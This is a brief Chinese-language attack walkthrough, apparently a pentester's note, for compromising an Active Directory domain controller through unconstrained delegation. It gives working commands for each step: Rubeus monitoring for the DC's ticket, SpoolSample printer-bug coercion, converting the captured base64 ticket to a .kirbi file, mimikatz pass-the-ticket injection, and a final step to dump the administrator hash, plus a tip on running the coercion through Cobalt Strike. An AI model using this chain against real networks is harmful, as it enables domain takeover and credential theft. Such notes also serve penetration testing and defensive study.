环境
域控:192.168.110.12 主机名:SYNC-DC
域内主机:192.168.1.101 主机名:mrhonest-pc
条件:
+ 获取到设置了非约束委派的主机system权限
利用方法
-
每秒监听来自域控主机(sync-dc$)的登录请求 现在是system权限
Rubeus.exe monitor /interval:1 /filteruser:SYNC-DC$
-
强制域控打印机回连,需在域用户进程上执行(我这里切换一下帐号),或者有域用户的帐号密码
实际中可以这样,cs上注入一个普通进程上执行,或者使用runas等工具执行
SpoolSample.exe SYNC-DC mrhonest-pc
-
收到票据
-
转换票据
[IO.File]::WriteAllBytes("绝对路径TGS icket.kirbi", [Convert]::FromBase64String("得到的base64"))
-
先清空自身票据 然后导入生成的票据
-
注入票据
kerberos::ptt ticket.kirbi
-
dump admin的hash`
